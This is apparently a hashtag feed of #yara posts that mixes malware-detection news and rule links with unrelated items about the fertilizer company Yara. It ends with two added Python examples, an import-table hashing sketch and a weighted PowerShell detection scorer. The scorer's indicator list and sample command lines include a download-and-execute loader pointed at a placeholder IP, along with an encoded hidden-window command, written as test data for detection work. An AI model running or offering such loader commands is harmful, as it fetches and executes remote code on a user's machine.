Project of the day (day 19) 2023, Sunday, September 10th
#LinuxDefender : https://github.com/seanpm2001/Linux_Defender/
#Linux #Defender is an anti-virus for Linux with a #WindowsDefender-like #interface (which can be turned off when needed). It clears most common Linux desktop malware, but extends to also include #spyware and, depending on how strict you set it to be, it can block the installation of programs like Google Chrome and other tracking software pieces (they are spyware), along with any #proprietary software.
It is written mostly in #Python, with rule sets additionally being written in #YARA. It is aimed at being ported to as many Linux distributions as possible. It is early in development and is not functional yet.
#linuxdefender #linux #defender #windowsdefender #interface #spyware #proprietary #python #yara
In Finland nobody wants to put news, travel stories or nature stories into context. Here too, the magnificent nature of Savo / Siilinjärvi is being hyped. At the same time an apatite mine is expanding right next door to Timonen and everyone else in Laukansalo. Marked in red. The cottages are tiny dots on the shore. Nothing at all will be left of that nature once the open pit and its waste rock take over the area. #Yara #Siilinjärvi
@nboynorge search for #ndaal #yara #yararules and you will find thousands of rules from us
#Pollution. Record fine for the fertilizer manufacturer #Yara France, near Saint-Nazaire
https://www.ouest-france.fr/environnement/pollution/pres-de-saint-nazaire-yara-france-devra-verser-519-000-euros-a-letat-pour-ses-rejets-560c34b2-09e5-11ee-b02d-4d4e5863b78e
The fertilizer plant in Montoir-de-Bretagne, having failed to bring itself up to standard, must this time pay the penalty payment of €519,000. A record.
🚨 #Chinese #APT Alert - #VoltTyphoon - Details and #IOCs 🚨
Remember the #Chinese #spy #balloon that made world news? Check this shit out: https://www.darkreading.com/endpoint/-volt-typhoon-china-backed-apt-infiltrates-us-critical-infrastructure?_mc=NL_DR_EDT_DR_weekly_20230525&cid=NL_DR_EDT_DR_weekly_20230525&sp_aid=116660&elq_cid=38046155&sp_eh=144c4ccfdc4bcabeefa4110f1ea26cecf2a866a1c04b99a946a3df0524ced34c&sp_eh=144c4ccfdc4bcabeefa4110f1ea26cecf2a866a1c04b99a946a3df0524ced34c&utm_source=eloqua&utm_medium=email&utm_campaign=DR_NL_Dark%20Reading%20Weekly_05.25.23&sp_cid=48686&utm_content=DR_NL_Dark%20Reading%20Weekly_05.25.23
#IOCs provided by the #NSA in a #JointAdvisory here: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
#chinese #apt #volttyphoon #iocs #spy #balloon #nsa #jointadvisory #cybersecurity #cyberespionage #yara #fortinet #soho
Yara cuts production in Europe amid lower fertilizer prices
#yara #demandafertilizantes #agronegocio #forbesagro
Yara and Enbridge plan a US$2.9 billion ammonia plant in Texas
#yara #producaodeamonia #enbridge #negocios #forbesagro
Today it's time to look at #YARA and, of course, regular expressions!
You can see the slides (Creative Commons) at:
https://gitlab.etsit.urjc.es/esoriano/public-slides/-/tree/master/malware-y-amenazas-dirigidas
📧🙄 #Emotet News: Another one of our predictions for the ongoing campaign turns out to be correct: E4 and E5 are now spamming #OneNote lures. We published a #Yara rule on @abuse_ch #Yarahub to detect the .one -> .wsf delivery method.
Yarahub: https://yaraify.abuse.ch/yarahub/rule/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23
#emotet #onenote #yara #yarahub #cybersecurity #infosec #blueteam
"Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW" published by Mandiant. #UNC2970, #LIGHTSHIFT, #LIGHTSHOW, #BYOVD, #YARA, #CTI, #OSINT, #LAZARUS https://www.mandiant.com/resources/blog/lightshift-and-lightshow
#unc2970 #lightshift #lightshow #byovd #yara #cti #osint #lazarus
"Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970" published by Mandiant. #UNC2970, #LIGHTSHOW, #BYOVD, #YARA, #CTI, #OSINT, #LAZARUS https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970
#unc2970 #lightshow #byovd #yara #cti #osint #lazarus
🚨 #CVE-2023-21716 is a new critical #RCE in Microsoft Word exploited through RTF documents. Similar, older exploits are still very popular with threat actors.
We tested the PoC created by @jduck and created a first prototype #yara hunting rule 🔍
Github: https://github.com/SIFalcon/Detection/blob/main/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar
Please keep in mind that this is meant as a hunting rule only and there is certainly potential for tuning.
More on CVE-2023-21716 as reported by @BleepinComputer: https://bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-21716
PoC: https://twitter.com/jduck/status/1632471544935923712
Happy hunting! 🕵️
Didier Stevens also wrote up a #YARA signature to detect suspicious OneNote files with embedded objects.
Anyone in the #malwareanalysis #reverseengineering #malware #yara space familiar with methods for finding similarity across 🍎 Mach-O 🍏 malware samples?
We hash things like the (ordered) import table, and the decoded rich header, and look for distinctive toolmarks in the DLL name, and PDB path in Portable Executables. I’m wondering if there are similar avenues already explored by anyone else?
I’m familiar with SymHash from Anomali, but haven’t heard of much other focus on clustering in those manners. Most reporting about Mach-O malware is focused on analysis of functionality.
#malwareanalysis #reverseengineering #malware #yara
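The "hash of the ordered import table" the post above mentions is the PE side of that question. As an added illustration (not the poster's tooling), here is that hashing in Python following the imphash normalization: lower-case, DLL extension stripped, `dll.func` entries joined with commas in import-directory order, MD5. The import tables are constructed; the ordinal-to-name tables real imphash applies to a few DLLs are left out.

```python
import hashlib

# Added illustration of ordered-import-table hashing (imphash style).
# Ordinal-only imports are passed through as given; the ordinal-to-name
# tables real imphash uses for a few DLLs are deliberately omitted here.

def normalize_import(dll: str, func: str) -> str:
    """Normalize one (dll, function) pair to the 'dll.func' form used by imphash."""
    dll = dll.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if dll.endswith(ext):
            dll = dll[: -len(ext)]
            break
    return f"{dll}.{func.lower()}"


def import_hash(imports) -> str:
    """MD5 over the import table in directory order; the order is part of the toolmark."""
    joined = ",".join(normalize_import(d, f) for d, f in imports)
    return hashlib.md5(joined.encode("ascii")).hexdigest()


# Constructed import tables, in the order a PE parser returns them from the import directory.
SAMPLE_A = [
    ("KERNEL32.dll", "GetProcAddress"),
    ("KERNEL32.dll", "LoadLibraryA"),
    ("KERNEL32.dll", "VirtualAlloc"),
    ("WS2_32.dll", "WSAStartup"),
]
# Same imports with different casing: same linker output, so it must hash equal.
SAMPLE_A_RECASED = [(d.upper(), f.lower()) for d, f in SAMPLE_A]
# Same set of imports in a different order: a different build, so it must differ.
SAMPLE_B_REORDERED = list(reversed(SAMPLE_A))

if __name__ == "__main__":
    for name, table in [("A", SAMPLE_A), ("A recased", SAMPLE_A_RECASED), ("B reordered", SAMPLE_B_REORDERED)]:
        print(f"{name:12s} {import_hash(table)}")
```

The reorder case is the point of hashing the *ordered* table: two binaries built from the same source with a different linker or build order produce a different toolmark, which is what makes it usable for clustering rather than just set comparison.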
here’s an exploration on the prevalence of shellcode hashes via #yara: http://www.williballenthin.com/post/shellcode-hash-prevalence/ #100DaysofYARA
#DarkBit Ransomware Targets #Israel with Command-Line Options and Optimized Encryption Routines https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel
#darkbit #israel #ioc #yara #geopolitics
Rarely do I stumble on a truly impressive #yara rule, but the weighted value nature of this one is impressive.
It assigns a "weight" to various strings in PowerShell commands to determine the likelihood of maliciousness in context when the string itself is highly prone to false positives.
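As an added illustration of the weighted-string idea from the post above (not the rule it refers to, which is not on this page), here is the same scoring written in Python so it can be read and tested directly. The patterns, weights, threshold and command lines are constructed for this example.

```python
import re

# Added illustration of weighted indicator scoring for PowerShell command lines.
# (pattern, weight): strings that are common in legitimate administration get
# low weights, strings rarely seen outside loaders get high ones, so no single
# noisy string can flag a command on its own.
INDICATORS = [
    (r"-enc(odedcommand)?\b", 3),
    (r"-w(indowstyle)?\s+hidden", 2),
    (r"-nop(rofile)?\b", 1),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 2),
    (r"frombase64string", 3),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", 2),
    (r"\biex\b|invoke-expression", 3),
    (r"new-object\s+net\.webclient", 2),
]
THRESHOLD = 5  # a total at or above this is flagged


def score_command(cmd: str):
    """Return (total weight, matched (pattern, weight) pairs) for one command line."""
    low = cmd.lower()
    hits = [(pat, w) for pat, w in INDICATORS if re.search(pat, low)]
    return sum(w for _, w in hits), hits


def is_suspicious(cmd: str) -> bool:
    return score_command(cmd)[0] >= THRESHOLD


# Constructed command lines: three admin-looking ones, two loader-looking ones.
BENIGN_LIST = "powershell.exe -NoProfile -Command Get-ChildItem C:\\logs"
BENIGN_DOWNLOAD = "powershell -NoProfile Invoke-WebRequest https://updates.example.test/agent.msi -OutFile agent.msi"
BENIGN_DEPLOY = "powershell -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1"
MAL_ENCODED = "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
MAL_DOWNLOAD_EXEC = "powershell IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"

if __name__ == "__main__":
    for cmd in (BENIGN_LIST, BENIGN_DOWNLOAD, BENIGN_DEPLOY, MAL_ENCODED, MAL_DOWNLOAD_EXEC):
        total, hits = score_command(cmd)
        print(f"{total:2d} {'SUSPICIOUS' if is_suspicious(cmd) else 'ok':10s} {cmd[:60]}")
```

Two details carry the false-positive handling: `-NoProfile` and `-ExecutionPolicy Bypass` are weighted so low that a deployment script using both still scores under the threshold, and the `\b` after `-enc` keeps `-Encoding UTF8` from counting as an encoded command. In a YARA rule the same sum can be written with `math.to_number()` applied to each string match, multiplied by its weight, in the condition.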